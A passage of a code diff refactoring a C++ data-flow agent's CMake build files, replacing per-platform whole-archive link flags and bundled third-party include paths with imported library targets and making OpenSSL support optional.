+++ b/extensions/sqlite/CMakeLists.txt
@@ -19,8 +19,6 @@
 
 include(${CMAKE_SOURCE_DIR}/extensions/ExtensionHeader.txt) 
 
-include_directories("${CMAKE_SOURCE_DIR}/thirdparty/sqlite")
-
 file(GLOB SOURCES "*.cpp")
 
 add_library(minifi-sqlite-extensions STATIC ${SOURCES})
@@ -32,22 +30,8 @@
   target_link_libraries(minifi-sqlite-extensions "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-target_link_libraries(minifi-sqlite-extensions ${CMAKE_DL_LIBS})
-target_link_libraries(minifi-sqlite-extensions sqlite)
-
-if (WIN32)
-    set_target_properties(minifi-sqlite-extensions PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-sqlite-extensions PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-sqlite-extensions PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
+target_link_libraries(minifi-sqlite-extensions ${LIBMINIFI})
+target_link_libraries(minifi-sqlite-extensions SQLite::SQLite3)
 
 
 SET (SQLITE-EXTENSIONS minifi-sqlite-extensions PARENT_SCOPE)
diff --git a/extensions/standard-processors/CMakeLists.txt b/extensions/standard-processors/CMakeLists.txt
index ddaf19f..c96d6ca 100644
--- a/extensions/standard-processors/CMakeLists.txt
+++ b/extensions/standard-processors/CMakeLists.txt
@@ -31,7 +31,7 @@
   target_link_libraries(minifi-standard-processors "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-target_link_libraries(minifi-standard-processors core-minifi)
+target_link_libraries(minifi-standard-processors ${LIBMINIFI})
 
 SET (STANDARD-PROCESSORS minifi-standard-processors PARENT_SCOPE)
 register_extension(minifi-standard-processors)
diff --git a/extensions/standard-processors/tests/CMakeLists.txt b/extensions/standard-processors/tests/CMakeLists.txt
index 0d525c2..8021279 100644
--- a/extensions/standard-processors/tests/CMakeLists.txt
+++ b/extensions/standard-processors/tests/CMakeLists.txt
@@ -20,34 +20,27 @@
 
 file(GLOB PROCESSOR_UNIT_TESTS  "unit/*.cpp")
 file(GLOB PROCESSOR_INTEGRATION_TESTS "integration/*.cpp")
-if (NOT OPENSSL_FOUND)
+if(OPENSSL_OFF)
 	list(REMOVE_ITEM PROCESSOR_INTEGRATION_TESTS "${CMAKE_CURRENT_SOURCE_DIR}/integration/SecureSocketGetTCPTest.cpp")
 endif()
 
 SET(PROCESSOR_INT_TEST_COUNT 0)
 
-find_package(OpenSSL REQUIRED)
 FOREACH(testfile ${PROCESSOR_UNIT_TESTS})
   	get_filename_component(testfilename "${testfile}" NAME_WE)
   	add_executable("${testfilename}" "${testfile}")
   	target_include_directories(${testfilename} BEFORE PRIVATE ${PROCESSOR_INCLUDE_DIRS})
-  	target_include_directories(${testfilename} BEFORE PRIVATE "${CIVET_THIRDPARTY_ROOT}")
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/test/")
 	target_include_directories(${testfilename} BEFORE PRIVATE "../")
 	target_include_directories(${testfilename} BEFORE PRIVATE "../processors")
 	target_include_directories(${testfilename} BEFORE PRIVATE ./include)
     createTests("${testfilename}")
     target_link_libraries(${testfilename} ${CATCH_MAIN_LIB})
-    if (APPLE)
-    	target_link_libraries ("${testfilename}" -Wl,-all_load ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-standard-processors minifi-civet-extensions)
-	elseif(WIN32)
-		target_link_libraries(${testfilename} ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi minifi-standard-processors minifi-civet-extensions)
-		set_target_properties(${testfilename} PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:minifi /WHOLEARCHIVE:minifi-standard-processors /WHOLEARCHIVE:minifi-civet-extensions")
-	else ()
-  		target_link_libraries ("${testfilename}" -Wl,--whole-archive ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-standard-processors minifi-civet-extensions -Wl,--no-whole-archive)
-  	endif()
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
+	target_wholearchive_library(${testfilename} minifi-civet-extensions)
   	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR})
-  MATH(EXPR PROCESSOR_INT_TEST_COUNT "${PROCESSOR_INT_TEST_COUNT}+1")
+
+	MATH(EXPR PROCESSOR_INT_TEST_COUNT "${PROCESSOR_INT_TEST_COUNT}+1")
 ENDFOREACH()
 
 message("-- Finished building ${PROCESSOR_INT_TEST_COUNT} processor unit test file(s)...")
@@ -58,32 +51,27 @@
   	get_filename_component(testfilename "${testfile}" NAME_WE)
   	add_executable("${testfilename}" "${testfile}")
   	target_include_directories(${testfilename} BEFORE PRIVATE ${PROCESSOR_INCLUDE_DIRS})
-	target_include_directories(${testfilename} BEFORE PRIVATE "${CIVET_THIRDPARTY_ROOT}")
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/test/")
 	target_include_directories(${testfilename} BEFORE PRIVATE "../")
 	target_include_directories(${testfilename} BEFORE PRIVATE "../processors")
 	target_include_directories(${testfilename} BEFORE PRIVATE ./include)
- 	 createTests("${testfilename}")
- 	 if (APPLE)
-    	target_link_libraries ("${testfilename}" -Wl,-all_load ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-standard-processors minifi-civet-extensions)
-	elseif(WIN32)
-		target_link_libraries(${testfilename} ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi minifi-standard-processors minifi-civet-extensions)
-		set_target_properties(${testfilename} PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:minifi /WHOLEARCHIVE:minifi-standard-processors /WHOLEARCHIVE:minifi-civet-extensions")
-	else ()
-  		target_link_libraries ("${testfilename}" -Wl,--whole-archive ${ZLIB_LIBRARY} ${OPENSSL_LIBRARIES} minifi-standard-processors minifi-civet-extensions -Wl,--no-whole-archive)
-  	endif()
- 	 MATH(EXPR INT_TEST_COUNT "${INT_TEST_COUNT}+1")
+ 	createTests("${testfilename}")
+	target_link_libraries(${testfilename})
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
+	target_wholearchive_library(${testfilename} minifi-civet-extensions)
+
+	MATH(EXPR INT_TEST_COUNT "${INT_TEST_COUNT}+1")
 ENDFOREACH()
 message("-- Finished building ${INT_TEST_COUNT} integration test file(s)...")
 
 
 add_test(NAME TestExecuteProcess COMMAND TestExecuteProcess )
 
-if (OPENSSL_FOUND)
-add_test(NAME SecureSocketGetTCPTest COMMAND SecureSocketGetTCPTest "${TEST_RESOURCES}/TestGetTCPSecure.yml"  "${TEST_RESOURCES}/")
-add_test(NAME SecureSocketGetTCPTestEmptyPass COMMAND SecureSocketGetTCPTest "${TEST_RESOURCES}/TestGetTCPSecureEmptyPass.yml"  "${TEST_RESOURCES}/")
-add_test(NAME SecureSocketGetTCPTestWithPassword COMMAND SecureSocketGetTCPTest "${TEST_RESOURCES}/TestGetTCPSecureWithPass.yml"  "${TEST_RESOURCES}/")
-add_test(NAME SecureSocketGetTCPTestWithPasswordFile COMMAND SecureSocketGetTCPTest "${TEST_RESOURCES}/TestGetTCPSecureWithFilePass.yml"  "${TEST_RESOURCES}/")
+if(NOT OPENSSL_OFF)
+	add_test(NAME SecureSocketGetTCPTest COMMAND SecureSocketGetTCPTest "${TEST_RESOURCES}/TestGetTCPSecure.yml"  "${TEST_RESOURCES}/")
+	add_test(NAME SecureSocketGetTCPTestEmptyPass COMMAND SecureSocketGetTCPTest "${TEST_RESOURCES}/TestGetTCPSecureEmptyPass.yml"  "${TEST_RESOURCES}/")
+	add_test(NAME SecureSocketGetTCPTestWithPassword COMMAND SecureSocketGetTCPTest "${TEST_RESOURCES}/TestGetTCPSecureWithPass.yml"  "${TEST_RESOURCES}/")
+	add_test(NAME SecureSocketGetTCPTestWithPasswordFile COMMAND SecureSocketGetTCPTest "${TEST_RESOURCES}/TestGetTCPSecureWithFilePass.yml"  "${TEST_RESOURCES}/")
 endif()
 
 add_test(NAME TailFileTest COMMAND TailFileTest "${TEST_RESOURCES}/TestTailFile.yml"  "${TEST_RESOURCES}/")
diff --git a/extensions/tensorflow/CMakeLists.txt b/extensions/tensorflow/CMakeLists.txt
index a641a18..a308756 100644
--- a/extensions/tensorflow/CMakeLists.txt
+++ b/extensions/tensorflow/CMakeLists.txt
@@ -39,6 +39,7 @@
   target_link_libraries(minifi-tensorflow-extensions "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
+target_link_libraries(minifi-tensorflow-extensions ${LIBMINIFI})
 target_link_libraries(minifi-tensorflow-extensions ${TENSORFLOW_LIBRARIES})
 
 SET (TENSORFLOW-EXTENSIONS minifi-tensorflow-extensions PARENT_SCOPE)
diff --git a/extensions/usb-camera/CMakeLists.txt b/extensions/usb-camera/CMakeLists.txt
index cfe1258..ef7e0b9 100644
--- a/extensions/usb-camera/CMakeLists.txt
+++ b/extensions/usb-camera/CMakeLists.txt
@@ -19,10 +19,7 @@
 
 include(${CMAKE_SOURCE_DIR}/extensions/ExtensionHeader.txt)
 
-find_package(PkgConfig)
-pkg_check_modules(LIBUSB libusb-1.0)
-
-find_package(png QUIET)
+find_package(PNG)
 if(PNG_FOUND)
     set(PNG_LINK_FLAGS ${PNG_LIBRARIES})
 else()
@@ -43,8 +40,12 @@
     message(FATAL_ERROR "A compatible PNG library is required to build GetUSBCamera.")
 endif()
 
-
-include_directories(../../thirdparty/libuvc-0.0.6/include)
+if(NOT TARGET PNG::PNG)
+    add_library(PNG::PNG UNKNOWN IMPORTED)
+    set_target_properties(PNG::PNG PROPERTIES
+            INTERFACE_INCLUDE_DIRECTORIES "${PNG_INCLUDE_DIR}"
+            INTERFACE_LINK_LIBRARIES ${PNG_LINK_FLAGS})
+endif()
 
 file(GLOB SOURCES  "*.cpp")
 
@@ -58,31 +59,8 @@
 endif()
 
 target_link_libraries(minifi-usb-camera-extensions ${LIBMINIFI})
-find_package(OpenSSL REQUIRED)
-include_directories(${OPENSSL_INCLUDE_DIR})
-target_link_libraries(minifi-usb-camera-extensions ${CMAKE_DL_LIBS} )
-target_link_libraries(minifi-usb-camera-extensions ${PNG_LINK_FLAGS})
-target_link_libraries(minifi-usb-camera-extensions uvc_static )
-target_link_libraries(minifi-usb-camera-extensions ${LIBUSB_LIBRARIES})
-find_package(ZLIB REQUIRED)
-include_directories(${ZLIB_INCLUDE_DIRS})
-target_link_libraries (minifi-usb-camera-extensions ${ZLIB_LIBRARIES})
-if (WIN32)
-    set_target_properties(minifi-usb-camera-extensions PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-usb-camera-extensions PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-usb-camera-extensions PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
-
+target_link_libraries(minifi-usb-camera-extensions libuvc PNG::PNG)
 
 SET (USB-CAMERA-EXTENSIONS minifi-usb-camera-extensions PARENT_SCOPE)
 
 register_extension(minifi-usb-camera-extensions)
-
diff --git a/extensions/windows-event-log/CMakeLists.txt b/extensions/windows-event-log/CMakeLists.txt
index 584820f..5241126 100644
--- a/extensions/windows-event-log/CMakeLists.txt
+++ b/extensions/windows-event-log/CMakeLists.txt
@@ -30,44 +30,9 @@
   target_link_libraries(minifi-wel "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-set(PUGI_BYPRODUCT_DIR "${CMAKE_CURRENT_BINARY_DIR}/thirdparty/pugixml-install" CACHE STRING "PugiXML install directory")
-set(BYPRODUCT "${PUGI_BYPRODUCT_DIR}/lib/pugixml.lib")
-  ExternalProject_Add(
-    pugixml-external
-    GIT_REPOSITORY "https://github.com/zeux/pugixml.git"
-    GIT_TAG "v1.9" 
-    SOURCE_DIR "${CMAKE_CURRENT_BINARY_DIR}/thirdparty/pugixml-src"
-    CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
-			   "-DBUILD_TESTS=OFF"
-			   "-DBUILD_SHARED_AND_STATIC_LIBS=OFF"
-			   "-DBUILD_SHARED_LIBS=OFF"
-               "-DCMAKE_INSTALL_PREFIX=${PUGI_BYPRODUCT_DIR}"
-    BUILD_BYPRODUCTS ${BYPRODUCT}
-  )
+target_link_libraries(minifi-wel ${LIBMINIFI})
+target_link_libraries(minifi-wel PUGI::libpugixml ZLIB::ZLIB Wevtapi.lib)
 
-include_directories("${PUGI_BYPRODUCT_DIR}/include")
-add_dependencies(minifi-wel pugixml-external)
-target_link_libraries(minifi-wel ${LIBMINIFI} ${BYPRODUCT})
-
-target_link_libraries(minifi-wel ${CMAKE_DL_LIBS} )
-find_package(ZLIB REQUIRED)
-include_directories(${ZLIB_INCLUDE_DIRS})
-target_link_libraries (minifi-wel ${ZLIB_LIBRARIES})
-if (WIN32)
-    set_target_properties(minifi-wel PROPERTIES
-        LINK_FLAGS "/WHOLEARCHIVE"
-    )
-elseif (APPLE)
-    set_target_properties(minifi-wel PROPERTIES
-        LINK_FLAGS "-Wl,-all_load"
-    )
-else ()
-    set_target_properties(minifi-wel PROPERTIES
-        LINK_FLAGS "-Wl,--whole-archive"
-    )
-endif ()
-
-
-SET (WEL-EXTENSION minifi-wel PARENT_SCOPE)
+SET(WEL-EXTENSION minifi-wel PARENT_SCOPE)
 
 register_extension(minifi-wel)
diff --git a/extensions/windows-event-log/tests/CMakeLists.txt b/extensions/windows-event-log/tests/CMakeLists.txt
index 7f798f1..a0f56b1 100644
--- a/extensions/windows-event-log/tests/CMakeLists.txt
+++ b/extensions/windows-event-log/tests/CMakeLists.txt
@@ -22,20 +22,14 @@
 FOREACH(testfile ${WEL_INTEGRATION_TESTS})
   	get_filename_component(testfilename "${testfile}" NAME_WE)
   	add_executable("${testfilename}" "${testfile}")
-  	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/windows-event-log/")
+  	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/extensions/windows-event-log/")
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/test/")
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/include/")
-	target_include_directories(${testfilename} BEFORE PRIVATE "${PUGI_BYPRODUCT_DIR}/include/")
-	createTests("${testfilename}")	
-	target_link_libraries(${testfilename} ${LIBMINIFI}  ${CATCH_MAIN_LIB})
-  	if (APPLE)
-		target_link_libraries (${testfilename} -Wl,-all_load minifi-wel)
-	elseif(WIN32)
-		target_link_libraries (${testfilename}	minifi-wel)
-		set_target_properties(${testfilename} PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:minifi-wel")
-	else ()
-	  	target_link_libraries (${testfilename} -Wl,--whole-archive minifi-wel -Wl,--no-whole-archive)
-	endif ()
+	createTests("${testfilename}")
+	target_wholearchive_library(${testfilename} minifi-wel)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
+	target_link_libraries (${testfilename} minifi ${CATCH_MAIN_LIB})
+
 	MATH(EXPR WEL_TEST_COUNT "${WEL_TEST_COUNT}+1")
 	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR})
 ENDFOREACH()
diff --git a/libminifi/CMakeLists.txt b/libminifi/CMakeLists.txt
index 34f72dd..6c89eef 100644
--- a/libminifi/CMakeLists.txt
+++ b/libminifi/CMakeLists.txt
@@ -34,7 +34,6 @@
 if (WIN32)
 	add_definitions(-DWIN32_LEAN_AND_MEAN)
 endif()
-
 IF (IOS)
 set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fobjc-abi-version=2 -fobjc-arc -std=gnu++11 -stdlib=libc++ -isysroot ${CMAKE_OSX_SYSROOT} -DIOS")
 set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -fobjc-abi-version=2 -fobjc-arc -isysroot ${CMAKE_OSX_SYSROOT} -DIOS")
@@ -75,11 +74,6 @@
 	set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -Wall -Wno-reorder")
 endif()
 
-include_directories(../thirdparty/spdlog-20170710/include)
-include_directories(../thirdparty/yaml-cpp-yaml-cpp-20171024/include)
-include_directories(../thirdparty/cron)
-include_directories(../thirdparty/rapidjson-1.1.0/include)
-include_directories(../thirdparty/concurrentqueue/)
 include_directories(include)
 
 
@@ -91,60 +85,31 @@
 set(SOCKET_SOURCES "src/io/posix/*.cpp")
 endif()
 
-find_package(OpenSSL)
-if (OPENSSL_FOUND)
+if (NOT OPENSSL_OFF)
 	set(TLS_SOURCES "src/io/tls/*.cpp")
-endif(OPENSSL_FOUND)
+endif()
 
 file(GLOB SOURCES  "src/utils/file/*.cpp" "src/sitetosite/*.cpp"  "src/core/logging/*.cpp"  "src/core/state/*.cpp" "src/core/state/nodes/*.cpp" "src/c2/protocols/*.cpp" "src/c2/triggers/*.cpp" "src/c2/*.cpp" "src/io/*.cpp" ${SOCKET_SOURCES} ${TLS_SOURCES} "src/core/controller/*.cpp" "src/controllers/*.cpp" "src/core/*.cpp"  "src/core/repository/*.cpp" "src/core/yaml/*.cpp" "src/core/reporting/*.cpp"  "src/provenance/*.cpp" "src/utils/*.cpp" "src/*.cpp")
 
 file(GLOB PROCESSOR_SOURCES  "src/processors/*.cpp" )
 
 
-file(GLOB SPD_SOURCES "../thirdparty/spdlog-20170710/include/spdlog/*")
-
-# Workaround the limitations of having a
-# header only library
-add_library(spdlog STATIC ${SPD_SOURCES})
 add_library(core-minifi STATIC ${SOURCES})
-target_link_libraries(core-minifi ${CMAKE_DL_LIBS} yaml-cpp)
-
-#target_link_libraries(core-minifi  PRIVATE bsdiff )
-
-
-include_directories(${ZLIB_INCLUDE_DIRS})
-
-target_link_libraries (core-minifi ${ZLIB_LIBRARIES})
-
+target_link_libraries(core-minifi ${CMAKE_DL_LIBS} yaml-cpp ZLIB::ZLIB concurrentqueue RapidJSON spdlog cron)
 if(NOT WIN32)
-	target_link_libraries (core-minifi OSSP::libuuid++)
+	target_link_libraries(core-minifi OSSP::libuuid++)
 endif()
-
-
-# Include OpenSSL
-if (OPENSSL_FOUND)
-	include_directories(${OPENSSL_INCLUDE_DIR})
-	if (WIN32)
-		foreach(OPENSSL_LIB ${OPENSSL_LIBRARIES})
-			if (OPENSSL_LIB MATCHES "\\.lib$" OR OPENSSL_LIB MATCHES "\\.dll$" )
-			message( "Including ${OPENSSL_LIB}")
-			target_link_libraries (core-minifi ${OPENSSL_LIB})	
-			set_target_properties(core-minifi PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:${OPENSSL_LIB}")
-			endif()
-		endforeach()
-	else()
-		target_link_libraries (core-minifi ${OPENSSL_LIBRARIES})
-	endif()
-
-endif (OPENSSL_FOUND)
+if (NOT OPENSSL_OFF)
+	target_link_libraries(core-minifi OpenSSL::SSL)
+endif()
 
 add_library(minifi STATIC ${PROCESSOR_SOURCES})
 
 
 target_link_libraries(minifi core-minifi)
 if (WIN32)
-set_target_properties(minifi PROPERTIES WINDOWS_EXPORT_ALL_SYMBOLS TRUE)
-set_target_properties(minifi PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:core-minifi")
+	set_target_properties(minifi PROPERTIES WINDOWS_EXPORT_ALL_SYMBOLS TRUE)
+	set_target_properties(minifi PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:core-minifi")
 endif()
 
 
@@ -152,39 +117,24 @@
 
 if (ENABLE_PYTHON AND NOT STATIC_BUILD)
 #### shared
+	add_library(core-minifi-shared SHARED ${SOURCES})
+	target_link_libraries(core-minifi-shared ${CMAKE_DL_LIBS} yaml-cpp ZLIB::ZLIB concurrentqueue RapidJSON spdlog cron)
+	if(NOT WIN32)
+		target_link_libraries(core-minifi-shared OSSP::libuuid++)
+	endif()
+	if (NOT OPENSSL_OFF)
+		target_link_libraries(core-minifi-shared OpenSSL::SSL)
+	endif()
 
-add_library(core-minifi-shared SHARED ${SOURCES})
-if (APPLE)
-	target_link_libraries(core-minifi-shared ${CMAKE_DL_LIBS} yaml-cpp)
-else()
-	target_link_libraries(core-minifi-shared ${CMAKE_DL_LIBS} yaml-cpp)
-endif()
+	add_library(minifi-shared SHARED ${PROCESSOR_SOURCES})
 
-include_directories(${ZLIB_INCLUDE_DIRS})
-
-target_link_libraries (core-minifi-shared ${ZLIB_LIBRARIES})
-
-if(NOT WIN32)
-	target_link_libraries (core-minifi-shared OSSP::libuuid++)
-endif()
-
-# Include OpenSSL
-
-if (OPENSSL_FOUND)
-	include_directories(${OPENSSL_INCLUDE_DIR})
-	target_link_libraries (core-minifi-shared ${OPENSSL_LIBRARIES})
-endif (OPENSSL_FOUND)
-
-add_library(minifi-shared SHARED ${PROCESSOR_SOURCES})
-
-target_link_libraries(minifi-shared core-minifi-shared)
-if (WIN32)
-set_target_properties(minifi-shared PROPERTIES WINDOWS_EXPORT_ALL_SYMBOLS TRUE)
-set_target_properties(minifi-shared PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:core-minifi-shared")
-endif()
+	target_link_libraries(minifi-shared core-minifi-shared)
+	if (WIN32)
+		set_target_properties(minifi-shared PROPERTIES WINDOWS_EXPORT_ALL_SYMBOLS TRUE)
+		set_target_properties(minifi-shared PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:core-minifi-shared")
+	endif()
 
 
-set_property(TARGET core-minifi-shared PROPERTY POSITION_INDEPENDENT_CODE ON)
-set_property(TARGET minifi-shared PROPERTY POSITION_INDEPENDENT_CODE ON)
-#endif()
+	set_property(TARGET core-minifi-shared PROPERTY POSITION_INDEPENDENT_CODE ON)
+	set_property(TARGET minifi-shared PROPERTY POSITION_INDEPENDENT_CODE ON)
 endif(ENABLE_PYTHON AND NOT STATIC_BUILD)
diff --git a/libminifi/include/controllers/SSLContextService.h b/libminifi/include/controllers/SSLContextService.h
index b56b163..ea5fef7 100644
--- a/libminifi/include/controllers/SSLContextService.h
+++ b/libminifi/include/controllers/SSLContextService.h
@@ -166,6 +166,7 @@
   std::string passphrase_file_;
   std::string ca_certificate_;
 
+#ifdef OPENSSL_SUPPORT
   static std::string getLatestOpenSSLErrorString() {
     unsigned long err = ERR_peek_last_error();
     if (err == 0U) {
@@ -175,6 +176,7 @@
     ERR_error_string_n(err, buf, sizeof(buf));
     return buf;
   }
+#endif
 
   static bool isFileTypeP12(const std::string& filename) {
     return utils::StringUtils::endsWithIgnoreCase(filename, "p12");
diff --git a/libminifi/src/controllers/SSLContextService.cpp b/libminifi/src/controllers/SSLContextService.cpp
index ee1ef2c..5af7f92 100644
--- a/libminifi/src/controllers/SSLContextService.cpp
+++ b/libminifi/src/controllers/SSLContextService.cpp
@@ -49,6 +49,7 @@
   initialized_ = true;
 }
 
+#ifdef OPENSSL_SUPPORT
 bool SSLContextService::configure_ssl_context(SSL_CTX *ctx) {
   if (!IsNullOrEmpty(certificate)) {
     if (isFileTypeP12(certificate)) {
@@ -133,6 +134,7 @@
 
   return true;
 }
+#endif
 
 /**
  * If OpenSSL is not installed we may still continue operations. Nullptr will
diff --git a/libminifi/test/archive-tests/CMakeLists.txt b/libminifi/test/archive-tests/CMakeLists.txt
index 63b76ea..76a54cc 100644
--- a/libminifi/test/archive-tests/CMakeLists.txt
+++ b/libminifi/test/archive-tests/CMakeLists.txt
@@ -26,11 +26,8 @@
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/extensions/libarchive")
 	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/standard-processors")
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/libarchive-3.3.2/libarchive")
-	if (APPLE)
-	      target_link_libraries (${testfilename} ${ZLIB_LIBRARIES} -Wl,-all_load minifi-archive-extensions minifi-standard-processors)
-	else ()
-	    target_link_libraries (${testfilename} ${ZLIB_LIBRARIES} -Wl,--whole-archive minifi-archive-extensions minifi-standard-processors -Wl,--no-whole-archive)
-	endif ()
+	target_wholearchive_library(${testfilename} minifi-archive-extensions)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
 	createTests("${testfilename}")
 	target_link_libraries(${testfilename} ${CATCH_MAIN_LIB})
 	MATH(EXPR EXTENSIONS_TEST_COUNT "${EXTENSIONS_TEST_COUNT}+1")
diff --git a/libminifi/test/bustache-tests/CMakeLists.txt b/libminifi/test/bustache-tests/CMakeLists.txt
index a7c2cfa..2361072 100644
--- a/libminifi/test/bustache-tests/CMakeLists.txt
+++ b/libminifi/test/bustache-tests/CMakeLists.txt
@@ -27,11 +27,8 @@
   target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/standard-processors")
   target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/thirdparty/bustache/include")
 
-  if (APPLE)
-    target_link_libraries (${testfilename} -Wl,-all_load minifi-bustache-extensions minifi-standard-processors)
-  else ()
-    target_link_libraries (${testfilename} -Wl,--whole-archive minifi-bustache-extensions minifi-standard-processors -Wl,--no-whole-archive)
-  endif ()
+  target_wholearchive_library(${testfilename} minifi-bustache-extensions)
+  target_wholearchive_library(${testfilename} minifi-standard-processors)
 
   createTests("${testfilename}")
   target_link_libraries(${testfilename} ${CATCH_MAIN_LIB})
diff --git a/libminifi/test/coap-tests/CMakeLists.txt b/libminifi/test/coap-tests/CMakeLists.txt
index 4da8737..6724259 100644
--- a/libminifi/test/coap-tests/CMakeLists.txt
+++ b/libminifi/test/coap-tests/CMakeLists.txt
@@ -23,12 +23,9 @@
   	get_filename_component(testfilename "${testfile}" NAME_WE)
   	add_executable("${testfilename}" "${testfile}")
   	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/coap/")
-	createTests("${testfilename}")	
-  	if (APPLE)
-		target_link_libraries (${testfilename} -Wl,-all_load minifi-coap)
-	else ()
-	  	target_link_libraries (${testfilename} -Wl,--whole-archive minifi-coap -Wl,--no-whole-archive)
-	endif ()
+	createTests("${testfilename}")
+	target_wholearchive_library(${testfilename} minifi-coap)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
 	MATH(EXPR COAP_TEST_COUNT "${COAP_TEST_COUNT}+1")
 	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
 ENDFOREACH()
diff --git a/libminifi/test/gps-tests/CMakeLists.txt b/libminifi/test/gps-tests/CMakeLists.txt
index fdb9af0..77abc3b 100644
--- a/libminifi/test/gps-tests/CMakeLists.txt
+++ b/libminifi/test/gps-tests/CMakeLists.txt
@@ -24,12 +24,9 @@
   	add_executable("${testfilename}" "${testfile}")
   	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/standard-processors")
   	target_include_directories(${testfilename} PRIVATE BEFORE "${CMAKE_SOURCE_DIR}/extensions/gps/")
-	createTests("${testfilename}")	
-  	if (APPLE)
-		target_link_libraries (${testfilename} -Wl,-all_load minifi-gps minifi-standard-processors)
-	else ()
-	  	target_link_libraries (${testfilename} -Wl,--whole-archive minifi-gps minifi-standard-processors -Wl,--no-whole-archive)
-	endif ()
+	createTests("${testfilename}")
+	target_wholearchive_library(${testfilename} minifi-gps)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
 	MATH(EXPR GPS_TEST_COUNT "${GPS_TEST_COUNT}+1")
 	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
 ENDFOREACH()
diff --git a/libminifi/test/jni-tests/CMakeLists.txt b/libminifi/test/jni-tests/CMakeLists.txt
index 1e465b1..6c0e082 100644
--- a/libminifi/test/jni-tests/CMakeLists.txt
+++ b/libminifi/test/jni-tests/CMakeLists.txt
@@ -28,11 +28,8 @@
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/librdkafka-0.11.1/src-cpp")
 	createTests("${testfilename}")
 	target_link_libraries(${testfilename} ${CATCH_MAIN_LIB})
-	if (APPLE)
-	      target_link_libraries (${testfilename} -Wl,-all_load minifi-rdkafka-extensions)
-	else ()
-	    target_link_libraries (${testfilename} -Wl,--whole-archive minifi-rdkafka-extensions -Wl,--no-whole-archive)
-	endif ()
+	target_wholearchive_library(${testfilename} minifi-jni)
+	target_wholearchive_library(${testfilename} minifi-standard-processors)
 	MATH(EXPR EXTENSIONS_TEST_COUNT "${EXTENSIONS_TEST_COUNT}+1")
 	add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
 ENDFOREACH()
diff --git a/libminifi/test/kafka-tests/CMakeLists.txt b/libminifi/test/kafka-tests/CMakeLists.txt
index 5172ca2..d337bd3 100644
--- a/libminifi/test/kafka-tests/CMakeLists.txt
+++ b/libminifi/test/kafka-tests/CMakeLists.txt
@@ -28,11 +28,8 @@
 	target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/librdkafka-0.11.4/src-cpp")
 	createTests("${testfilename}")
 	target_link_libraries(${testfilename} ${CATCH_MAIN_LIB})
-	if (APPLE)
-	      target_link_libraries (${testfilename} -Wl,-all_load minifi-rdkafka-extensions)
-	else ()
